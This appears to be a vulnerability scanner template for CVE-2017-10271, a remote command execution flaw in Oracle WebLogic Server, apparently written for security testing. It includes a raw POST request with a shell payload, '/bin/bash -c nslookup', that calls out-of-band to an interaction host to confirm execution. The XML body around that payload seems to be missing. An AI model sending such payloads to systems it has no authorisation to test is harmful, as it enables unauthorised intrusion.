id: CVE-2017-10271 info: name: Oracle Fusion Middleware WebLogic Server - Remote Command Execution author: dr_set severity: high description: The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent - WLS Security) is susceptible to component deserialization remote command execution. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Unauthenticated attackers with network access via T3 can leverage this vulnerability to compromise Oracle WebLogic Server. reference: - https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2017-10271 - https://github.com/SuperHacker-liuan/cve-2017-10271-poc - https://www.oracle.com/security-alerts/cpuoct2017.html - https://nvd.nist.gov/vuln/detail/CVE-2017-10271 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H cvss-score: 7.5 cve-id: CVE-2017-10271 tags: cve,cve2017,rce,oracle,weblogic,oast requests: - raw: - | POST /wls-wsat/CoordinatorPortType HTTP/1.1 Host: {{Hostname}} Accept: */* Accept-Language: en Content-Type: text/xml /bin/bash -c nslookup {{interactsh-url}} matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the DNS interaction words: - "dns" - type: status status: - 500 # Enhanced by mp on 2022/04/20